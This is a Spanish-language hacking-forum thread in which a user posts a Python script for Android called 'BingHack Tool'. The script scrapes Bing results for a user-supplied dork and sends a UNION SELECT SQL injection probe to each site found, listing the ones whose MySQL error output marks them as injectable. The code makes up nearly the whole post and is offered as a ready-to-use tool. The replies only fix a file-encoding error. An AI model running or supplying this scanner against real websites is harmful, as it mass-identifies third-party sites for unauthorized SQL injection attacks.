elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Python-Android] BingHack Tool 0.1
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Python-Android] BingHack Tool 0.1  (Leído 2,192 veces)
BigBear


Desconectado Desconectado

Mensajes: 545



Ver Perfil
[Python-Android] BingHack Tool 0.1
« en: 1 Septiembre 2013, 21:19 pm »

Un simple script en Python para Android con el fin de buscar paginas vulnerables a SQLI usando Bing.

El codigo :

Código
  1. #!usr/bin/python
  2. #BingHack Tool 0.1
  3. #Android Version
  4. #(C) Doddy Hackman 2013
  5.  
  6. import android,urllib2,re
  7.  
  8. nave = urllib2.build_opener()
  9. nave.add_header = [('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5')]
  10.  
  11. def toma(web) :
  12. nave = urllib2.Request(web)
  13. nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
  14. op = urllib2.build_opener()
  15. return op.open(nave).read()
  16.  
  17. def sql(webs):
  18. respuesta = ""
  19. for web in webs :
  20.  if re.findall("=",web):
  21.   web = re.split("=",web)
  22.   web = web[0]+"="
  23.  
  24.   try:
  25.    code = toma(web+"-1+union+select+1--")
  26.    if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
  27.     respuesta = respuesta + "[SQLI] : "+web+"\n"
  28.   except:
  29.    pass
  30. return respuesta
  31.  
  32. def limpiar(pag):
  33.  
  34. limpia = []
  35. for p in pag:
  36.  if p not in limpia:
  37.   limpia.append(p)
  38. return limpia
  39.  
  40. def buscar(dork,count):
  41.  
  42. respuesta = ""
  43.  
  44. pag = []
  45. s = 10  
  46.  
  47. while s <= int(count):
  48.  try:
  49.   code = toma("http://www.bing.com/search?q="+str(dork)+"&first="+str(s))
  50.   d = re.findall("<h3><a href=\"(.*?)\"",code,re.I)
  51.   s += 10
  52.   for a in d:
  53.    pag.append(a)
  54.  except:
  55.   pass
  56.  
  57. pag = limpiar(pag)
  58.  
  59. return pag
  60.  
  61. aplicacion = android.Android()
  62.  
  63. def menu():
  64.  
  65. aplicacion.dialogCreateAlert("BingHack Tool 0.1")
  66. aplicacion.dialogSetItems(["Search","About","Exit"])
  67. aplicacion.dialogShow()
  68. re = aplicacion.dialogGetResponse().result
  69. re2 = re["item"]
  70.  
  71. if re2==0:
  72.  
  73.  red = aplicacion.dialogGetInput("BingHack Tool 0.1","Write the dork")
  74.  dork = str(red[1])
  75.  
  76.  red = aplicacion.dialogGetInput("BingHack Tool 0.1","Write the number of pages to search")
  77.  paginas = str(red[1])
  78.  
  79.  aplicacion.dialogCreateSpinnerProgress("BingHack Tool 0.1","Searching ...")
  80.  aplicacion.dialogShow()
  81.  
  82.  founds = ""
  83.  rez = ""
  84.  rtafinal = ""
  85.  
  86.  founds = buscar(dork,paginas)
  87.  
  88.  aplicacion.dialogDismiss()
  89.  
  90.  aplicacion.dialogCreateSpinnerProgress("BingHack Tool 0.1","Scanning ...")
  91.  aplicacion.dialogShow()
  92.  
  93.  rez = sql(founds)
  94.  
  95.  if len(rez) == 0 :
  96.   rtafinal = "[-] Not Found"
  97.  else :
  98.   rtafinal = "[++] Pages Founds\n\n"
  99.   rtafinal = rtafinal + rez
  100.   rtafinal = rtafinal + "\n[++] Finished\n"
  101.  
  102.  aplicacion.dialogDismiss()
  103.  
  104.  aplicacion.dialogCreateAlert("BingHack Tool 0.1",rtafinal)
  105.  aplicacion.dialogSetPositiveButtonText("Done")
  106.  aplicacion.dialogShow()
  107.  
  108.  op = aplicacion.dialogGetResponse().result
  109.  if op["which"] == "positive" :
  110.   menu()
  111.  
  112. if re2==1 :
  113.  aplicacion.dialogCreateAlert("BingHack Tool 0.1","(C) Doddy Hackman 2013")
  114.  aplicacion.dialogSetPositiveButtonText("Done")
  115.  aplicacion.dialogShow()
  116.  re3 = aplicacion.dialogGetResponse().result
  117.  if re3["which"] == "positive" :
  118.   menu()
  119.  
  120.  if re3==2:
  121.   aplicacion.exit()
  122.  
  123. menu()
  124.  
  125. # The End ?
  126.  

Eso es todo.


« Última modificación: 4 Febrero 2015, 03:19 am por Eleкtro » En línea

Mtxmks

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: [Python-Android] BingHack Tool 0.1
« Respuesta #1 en: 8 Septiembre 2013, 21:12 pm »

me arroja un error al tratar de correr el script



que hice mal?


En línea

fallout20xx

Desconectado Desconectado

Mensajes: 53



Ver Perfil
Re: [Python-Android] BingHack Tool 0.1
« Respuesta #2 en: 20 Septiembre 2013, 10:01 am »

es un error de codificacion, hay algun caracter que no entiende porque no es ascii, puedes poner esto al principio para que python entienda que tiene que usar otra codificacion:

# -*- coding: utf-8 -*-

o

# -*- coding: iso-8859-15 -*-

ponlo en la linea 2.
En línea

si disfrutas siempre que programas... significa que aun no has programado suficiente xD
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Perl] BingHack Tool 0.1
Scripting
BigBear 0 727 Último mensaje 26 Mayo 2012, 16:02 pm
por BigBear
[Perl Tk] BingHack Tool 0.1 « 1 2 »
Scripting
BigBear 10 2,619 Último mensaje 28 Mayo 2012, 23:23 pm
por BigBear
[PyQT4] BingHack Tool 0.1
Scripting
BigBear 1 1,102 Último mensaje 3 Noviembre 2012, 15:45 pm
por Stakewinner00
[Java] BingHack Tool 0.1
Java
BigBear 0 899 Último mensaje 13 Enero 2013, 03:39 am
por BigBear
[Delphi] BingHack Tool 0.1
Programación General
BigBear 0 858 Último mensaje 31 Mayo 2013, 20:53 pm
por BigBear
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines